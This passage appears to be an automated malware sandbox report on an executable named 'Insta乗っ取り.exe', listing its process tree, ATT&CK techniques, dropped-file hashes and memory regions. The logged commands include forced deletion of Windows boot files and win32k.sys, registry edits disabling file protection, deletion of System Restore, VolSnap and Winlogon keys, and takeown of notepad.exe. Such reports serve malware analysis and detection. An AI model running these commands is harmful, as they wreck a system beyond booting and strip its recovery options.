    C:\Windows\system32\cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f"
    3⤵
    PID:4024
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableFileSystemProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.exe"
    3⤵
    PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winload.exe"
    3⤵
    PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\BOOTVID.DLL"
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\winload.efi"
    3⤵
    PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\Boot\winresume.efi"
    3⤵
    PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootsect.exe"
    3⤵
    PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootim.exe"
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\bootux.dl"
    3⤵
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "del /f /q C:\Windows\System32\win32k.sys"
    3⤵
    PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VolSnap /f"
    3⤵
    PID:1240

C:\Windows\System32\Insta乗っ取り.exe
C:\Windows\System32\Insta乗っ取り.exe
1⤵
- Executes dropped EXE
PID:4336
- C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\Insta乗っ取り.exe
  C:\Windows\System32\Insta乗っ取り.exe
  2⤵
  PID:3044

C:\Windows\system32\reg.exe
reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MiniDumper /f
1⤵
PID:4508

C:\Windows\system32\reg.exe
reg del HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemRestore /f
1⤵
PID:3712

C:\Windows\system32\reg.exe
reg del HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /f
1⤵
PID:4300

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
1⤵
PID:4872

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe" /a
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_asyncio.pyd

Filesize
69KB

MD5
90a38a8271379a371a2a4c580e9cd97d

SHA1
3fde48214fd606114d7df72921cf66ef84bc04c5

SHA256
3b46fa8f966288ead65465468c8e300b9179f5d7b39aa25d7231ff3702ca7887

SHA512
3bde0b274f959d201f7820e3c01896c24e4909348c0bc748ade68610a13a4d1e980c50dab33466469cdd19eb90915b45593faab6c3609ae3f616951089de1fdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

Filesize
83KB

MD5
30f396f8411274f15ac85b14b7b3cd3d

SHA1
d3921f39e193d89aa93c2677cbfb47bc1ede949c

SHA256
cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f

SHA512
7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

Filesize
64KB

MD5
a25bc2b21b555293554d7f611eaa75ea

SHA1
a0dfd4fcfae5b94d4471357f60569b0c18b30c17

SHA256
43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d

SHA512
b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

Filesize
156KB

MD5
9e94fac072a14ca9ed3f20292169e5b2

SHA1
1eeac19715ea32a65641d82a380b9fa624e3cf0d

SHA256
a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f

SHA512
b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

Filesize
81KB

MD5
69801d1a0809c52db984602ca2653541

SHA1
0f6e77086f049a7c12880829de051dcbe3d66764

SHA256
67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3

SHA512
5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

Filesize
292KB

MD5
50ea156b773e8803f6c1fe712f746cba

SHA1
2c68212e96605210eddf740291862bdf59398aef

SHA256
94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47

SHA512
01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

Filesize
5.0MB

MD5
123ad0908c76ccba4789c084f7a6b8d0

SHA1
86de58289c8200ed8c1fc51d5f00e38e32c1aad5

SHA256
4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43

SHA512
80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

Filesize
774KB

MD5
4ff168aaa6a1d68e7957175c8513f3a2

SHA1
782f886709febc8c7cebcec4d92c66c4d5dbcf57

SHA256
2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950

SHA512
c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\psutil\_psutil_windows.pyd

Filesize
67KB

MD5
4a7194e88e80c74523a6228ecacd9169

SHA1
317fda5e38daa5482c4facffff9950af67e89a68

SHA256
3df3f4cf3d9b3b774e3f34ae12fa818fdbc863a60e40337ec436a1e18ba711d6

SHA512
f1d688580d48649101dccfd0d7304e0a67b8626d3516c65e06b3e82dbb1693a235a08127e4e6436662c473a8c7c38164c4fdaaf989b480db98233d947f158a91

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

Filesize
1.1MB

MD5
a8ed52a66731e78b89d3c6c6889c485d

SHA1
781e5275695ace4a5c3ad4f2874b5e375b521638

SHA256
bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7

SHA512
1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hs4a0i2h.4jl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\Insta乗っ取り.exe

Filesize
23.3MB

MD5
a5a284ba144e5f29d9da29bd954a10c9

SHA1
2cb0ecdc437c24a87749120ec5de4f52e8e9f921

SHA256
74eab33509bff3af861ceab2aca6519ed5f3d51399dcf29f74f24333abba9605

SHA512
987fdd8a8ac9361eb18994141ca2fe8ea845aff8a36ce49ceb0683ec5dfc5de8a375d28870090dddaa9cdfd96799c0fd5740d9ed0e1dd9126ae9e145b72678c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\_brotli.pyd

Filesize
802KB

MD5
9ad5bb6f92ee2cfd29dde8dd4da99eb7

SHA1
30a8309938c501b336fd3947de46c03f1bb19dc8

SHA256
788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8

SHA512
a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\_ctypes.pyd

Filesize
122KB

MD5
5377ab365c86bbcdd998580a79be28b4

SHA1
b0a6342df76c4da5b1e28a036025e274be322b35

SHA256
6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93

SHA512
56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\_overlapped.pyd

Filesize
54KB

MD5
737f46e8dac553427a823c5f0556961c

SHA1
30796737caec891a5707b71cf0ad1072469dd9de

SHA256
2187281a097025c03991cd8eb2c9ca416278b898bd640a8732421b91ada607e8

SHA512
f0f4b9045d5328335dc5d779f7ef5ce322eaa8126ec14a84be73edd47efb165f59903bff95eb0661eba291b4bb71474dd0b0686edc132f2fba305c47bb3d019f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\_queue.pyd

Filesize
31KB

MD5
e1c6ff3c48d1ca755fb8a2ba700243b2

SHA1
2f2d4c0f429b8a7144d65b179beab2d760396bfb

SHA256
0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa

SHA512
55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\_ssl.pyd

Filesize
174KB

MD5
90f080c53a2b7e23a5efd5fd3806f352

SHA1
e3b339533bc906688b4d885bdc29626fbb9df2fe

SHA256
fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4

SHA512
4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\python312.dll

Filesize
6.6MB

MD5
166cc2f997cba5fc011820e6b46e8ea7

SHA1
d6179213afea084f02566ea190202c752286ca1f

SHA256
c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

SHA512
49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4072_133770996895269274\select.pyd

Filesize
30KB

MD5
7c14c7bc02e47d5c8158383cb7e14124

SHA1
5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3

SHA256
00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5

SHA512
af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\Insta乗っ取り.exe

Filesize
4.5MB

MD5
314633ac445f19899f17d9f57f042295

SHA1
7af511ee732f603a38004d4230037cac37e1fbf6

SHA256
4a37f182c4e12b579bdd1976bcb10505438e389f66bafe018782153fa9468ccc

SHA512
0ea73417fb42ec6b0e4cf1d52ae249c6fa5e6ef973b27f68ed4feae1a652d58d8e0f8905d39c7fced46635b10d50f1bbcbd2964cacd5cde3471e73f7c435ad9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\Insta乗っ取り.exe

Filesize
3.9MB

MD5
09dcd48911993ff2be084db1f047e99c

SHA1
32cea6b0ae158afb3b369db851374db218ce81ee

SHA256
d28bb072d3fd9bc2afef0cf142ac2429ee2d430f9dc022fca645664a52b78a23

SHA512
7bdfe0945f4e601fa788167225420d5fd2286395beb5d1e89f286b9e18034d0fb079bd3ade717595ef62b61ad4befa754a99073263f74ab268ec353d8b767f7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\libcrypto-3.dll

Filesize
3.3MB

MD5
ac85743c40e634ab4a674a401a7b3488

SHA1
119a03ee64fb94d34406dcd91909d7cc7cf7f49f

SHA256
cf33f632e2bdd00387fd2a314280ad33638fbe19556bccd71a595fa23ad195ec

SHA512
6044d1e55de6993d1cb40bd7a4d4ec6a7bd3d8a17340cc95a7d04cc93a06ccfecd91342be29aa3ea252e62c7802f5bffd79cb43ce6c16a6929915084f382c9a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\python312.dll

Filesize
4.4MB

MD5
4843293269d946f3e26fab633faa6061

SHA1
b4c91d3686676fe6020afc5f933bad2e8f30df04

SHA256
d73feee5bdca7f6823feb78905b656e83a512851377b6ad131da5345ec791f1e

SHA512
161a262eaa19d15de6110e6e81e524fcf2ce65be3f554d23df3938d98820f5d35ecf9396532ea1da8ef2c126184356e80f81b75fb15d776fe1fe0e8b4f1c799f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_4336_133770996959382701\python312.dll

Filesize
4.0MB

MD5
3f64341aa079f5628496237e522d45a0

SHA1
3a53fa99720f1f52fe65d12dae16a6d51b997859

SHA256
a69ea1a2b0af43b37aa6b42708f5a6aeaf3f885b1504083bd5f86369437471fb

SHA512
b98633f14245b3bcf0c7a753f0965e3fa42c363678e399ddedf507a13881e912c9c02c684ffd9fddd5e92f410fe6dcca5995cce274dce4cb758a6cadbd8ad2a4

Download Submit
C:\Windows\System32\Insta乗っ取り.exe

Filesize
12.8MB

MD5
de7860d4d6be9c13acee02489caa19a5

SHA1
4b561424d054f36c247f400e95ec0a4a226687d3

SHA256
bc6af9ff1b56c779aa75f349a07c4627905f01dff6a68565b4b4baa4ee9f5d70

SHA512
bbebb9d972d6653639b597527d70798626eacb93b89a3227da480a0091b8fae08988082633043bc76b741420eb18385b5025c115e451938bf9d83b05230fd74f

Download Submit
memory/496-166-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/656-162-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/1264-140-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/2032-75-0x0000016A7AF40000-0x0000016A7AF62000-memory.dmp

Filesize
136KB

Download
memory/3076-146-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/3284-173-0x00007FFFF7C70000-0x00007FFFF7E1C000-memory.dmp

Filesize
1.7MB

Download
memory/3476-167-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/3508-144-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/3592-141-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/3860-168-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/4104-142-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download
memory/4480-148-0x00007FFFF7230000-0x00007FFFF72ED000-memory.dmp

Filesize
756KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads